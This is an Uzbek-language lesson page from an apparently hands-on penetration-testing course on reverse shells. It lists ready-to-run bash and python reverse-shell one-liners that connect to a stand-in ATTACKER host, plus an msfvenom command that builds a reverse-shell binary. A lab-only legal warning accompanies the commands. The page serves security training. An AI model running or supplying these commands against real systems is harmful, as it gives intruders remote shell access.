Modulga qaytish
O'quv darsi / Exploitation va Post-Exploitation

Reverse shell

Maqsaddan bizga ulanuvchi shell — firewall'ni aylanib o'tish texnikasi.

25 daq.ilg'or3 komanda1/4
Dars holati
Davom etmoqda
Amaliy komandalar0/3
Maqsadlar
  • Bash, python, nc payload'lar
  • msfvenom bilan generatsiya
Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

0%
$bash -i >& /dev/tcp/ATTACKER/4444 0>&1
$python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
$msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o shell.elf